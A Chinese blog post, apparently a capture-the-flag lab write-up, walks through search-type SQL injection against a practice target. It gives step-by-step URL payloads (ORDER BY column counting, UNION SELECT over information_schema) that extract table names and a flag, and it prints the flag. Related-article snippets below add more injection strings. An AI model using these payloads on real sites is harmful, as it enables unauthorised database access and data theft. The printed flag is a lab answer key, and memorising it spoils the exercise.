SQL注入:搜索型注入

最新推荐文章于 2024-06-30 07:00:00 发布
最新推荐文章于 2024-06-30 07:00:00 发布
阅读量2.6k 收藏 5
点赞数
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qxx5203/article/details/125927817
版权

like语法
"%"匹配任何字符,  "like"的意思就是像,  "$" 变量
SQL语句:select username,id from admin where username like '%$name%'

进入靶场后出现此界面,在登录界面输入1’判断一下是数字型还是字符型。

页面下方出现账号密码错误或用户未注册!那先注册,后登录。

 

判断是否有注入点

搜索框内  输入a正常回显

                输入a’报错

 

 

猜解列名数量(字段数)

URL地址中输入a' order by 1 #  报错

http://47.103.94.191:8015/sqli_1.php?title=a' order by 1 # &action=search

 

URL地址中输入a’’/a% order by 1 #正常回显,却无法判断字段数,也无法查看报错位。我们尝试把注释符#换成--+,正常回显 

 http://47.103.94.191:8015/sqli_1.php?title=a' order by 1 --+ &action=search

8页面显示不正常,发现最大正常位是7 

查看报错位(2,3,4,5报错)

http://47.103.94.191:8015/sqli_1.php?title=a' union select 1,2,3,4,5,6,7 --+ &action=search

获取数据库信息

获取数据库名称(whalwl

数据库表的信息(blog,heroes,movies,this_flag,users,visitors)

http://47.103.94.191:8015/sqli_1.php?title=a' union select 1,database(),3,4,group_concat(table_name),6,7 from information_schema.tables where table_schema=database() --+ &action=search

查找this_flag表下的列

数据库列的信息:id,num,flag

http://47.103.94.191:8015/sqli_1.php?title=a' union select 1,database(),3,4,group_concat(column_name),6,7 from information_schema.columns where table_name='this_flag' --+ &action=search

获取flag

http://47.103.94.191:8015/sqli_1.php?title=a' union select 1,database(),3,4,flag,6,7 from whalwl.this_flag --+ &action=search

 

提交flag

flag{86b757e867b43d16050225ab516b2274}

 

 

差一点成熟。
关注
SQL注入——搜索注入
zjdda的博客
05-30 7432
搜索注入原理 语句构造
防止xss和sql注入:JS特殊字符过滤正则
10-27
防止xss和sql注入:JS特殊字符过滤正则,需要的朋友可以参考一下
SQL注入系列之PHP+Mysql手动注入(三)----搜索(POST/GET)
fendo
02-26 1万+
一、搜索注入简介与原理 1)简介 一些网站为了方便用户查找网站的资源,都对用户提供了搜索的功能,因为是搜索功能,往往是程序员在编写代码时都忽略了对其变量(参数)的过滤,而且这样的漏洞在国内的系统中普遍的存在: 2)原理 $sql="select * from user where password like '%$pwd%' order by pa
搜索注入
热门推荐
cnbird's blog
07-16 2万+
如果没有说错的话,在国内应该是lake2最早提出搜索文本框注入的。这个问题我也是最近才搞明白的,因为上网时间少,工作又比较忙,所以很少时间来学习。以前很傻以为搜索注入就是直接在文本框中输入and 1=1 和and 1=2,结果每次都是出现同样的页面,说是什么没有找到你搜索的关键词,汗啊 曾经有个人就说过,中国的黑客满地都是啊;而且有一项调查显示,中国有超过50%的大学生想成为黑客,这也许就是
SQL注入搜索盲注(手工注入
qxx5203的博客
07-22 1238
看看有没有注入点,页面异常。也尝试了其他手工注入的方法,仍然异常。判断一下是数字还是字符,页面异常。6页面显示不正常,发现最大正常位是5。,我们在搜索框中发现注入点。搜索框内输入a正常回显。进入靶场后出现此界面,在。用户名输入1’,密码任意。数据库列的信息id,...
高级SQL注入:混淆和绕过.pdf
03-21
高级SQL注入:混淆和绕过 本文总结了高级SQL注入技术,包括混淆和绕过技术,旨在帮助安全研究人员和开发者更好地理解和防止SQL注入攻击。下面是本文中提到的关键知识点: 1. 过滤规避(Mysql):通过使用特殊的SQL...
防范Java中的SQL注入:策略与实践
最新发布
08-30
SQL注入是一种常见的Web应用安全漏洞,它允许攻击者通过在应用程序的输入字段中插入恶意SQL代码,从而对数据库进行未授权的访问或操作。由于Java广泛用于企业级Web应用的开发,因此了解如何在Java中识别和防护SQL...
SQL手工注入大全:包含各种类SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
SQL手工注入大全:包含各种类SQL注入,实现手工注入的乐趣,此资源你值得拥有。 此资源包含:宽字节注入SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试...
SQL注入SQL注入(手动)&SQL注入的检测
caoxinjian423的博客
03-07 1577
一、SQL注入流程 1、判断是否有SQL注入漏洞(检测) 2、判断操作系统、数据库和web应用类 3、获取数据库信息,包括管理员信息及拖库 4、加密信息破解,sqlmap可自动破解 5、提升权限,获得sql-shell、os-shell、登录应用后台 二、SQL注入(手动) 1、基于错误的注入 错误注入的思路是通过构造特殊的sql语句,根据得到的错误信息,确认sql注入点 ...
mysql搜索注入_SQL注入系列之PHP+Mysql手动注入(三)----搜索(POST/GET)
weixin_39668965的博客
01-19 262
一、搜索注入简介与原理1)简介一些网站为了方便用户查找网站的资源,都对用户提供了搜索的功能,因为是搜索功能,往往是程序员在编写代码时都忽略了对其变量(参数)的过滤,而且这样的漏洞在国内的系统中普遍的存在:其中又分为POST/GET,GET的一般是用在网站上的搜索,而POST则用在用户名的登录,可以从form表单的method="get"属性来区分是get还是post。搜索注入又称为文本框注入...
SQL注入 (中级篇)搜索注入
weixin_41472455的博客
05-06 720
搜索注入: 其实对于初学SQL注入,并不需要区分注入。 但是要理解搜索注入,首先需要理解SQL搜索语句,举个例子 我们希望从 "Persons" 表中选取居住在包含 "lon" 的城市里的人: 我们可以使用下面的 SELECT 语句: SELECT * FROM Persons WHERE City LIKE '%lon%' 通常来讲 SQL注入只是后台的 数据库查询语...
3.SQL注入-搜索
愿听风成曲
06-30 228
将payload输入搜索框会发现所有用户信息已出现。通过以上猜测进行构造payload语句。通过上图搜索可以猜测的sql语句为。输入k字段进行搜索发现出用户信息。后台代理逻辑,通过前端传入参数。
SQL--搜索注入
weixin_30652879的博客
07-25 225
查询语句:SELECT * from sqltest where names like'%要查询的关键字%' 在搜索框内输入1%' and 1=1 and '%'='正常回显; 在搜索框内输入1%' and 1=2 and '%'='报错则存在注入, 之后搜索关键词。 转载于:https://www.cnblogs.com/ldsec/p/5704075.html...
搜索注入
haodawei123的博客
01-17 1967
如上面的这样的带搜索框的,输入单引号测试 出现错误就存在搜索注入漏洞 第一步:输入单引号点击搜索 出错就是典搜索注入 第二步:用一个关键字来判断 1%’ and 1=1 and ‘%’=’ 返回正常 1%’ and 1=2 and ‘%’=’ 返回错误 第三步:用抓包工具抓包 sel_big=1&text_key=1&input.x=28&input.y=11 构造...
mysql搜索注入_pikachu-搜索注入 #手工注入
weixin_28745525的博客
02-28 349
1.搜索注入漏洞产生的原因:在搭建网站的时候为了方便用户搜索该网站中的资源,程序员在写网站脚本的时候加入了搜索功能,但是忽略了对搜索变量的过滤,造成了搜索注入漏洞,又称文本框注入。2.搜索注入的类:同其他注入相同,由于提交表单的不同,可分为GET(多出现于网站上的搜索)和POST(多出现于用户名的登录搜索匹配),搜索注入是国内系统中普遍存在的漏洞。3.原理分析:select us...
经典的注入语句
数据库天地
10-04 155
经典的注入语句 注意:对于普通的get注入,如果是字符,前加' 后加 and ''=' 拆半法 ###################################### and exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。 and exists (s...
SQL注入:数字注入详解与实战
"SQL注入之数字注入" SQL注入是一种常见的网络安全漏洞,主要发生在Web应用程序中。当用户输入的数据未经适当过滤或验证就被直接用于构造SQL查询时,攻击者可以通过精心构造的输入,改变原本的查询逻辑,从而获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值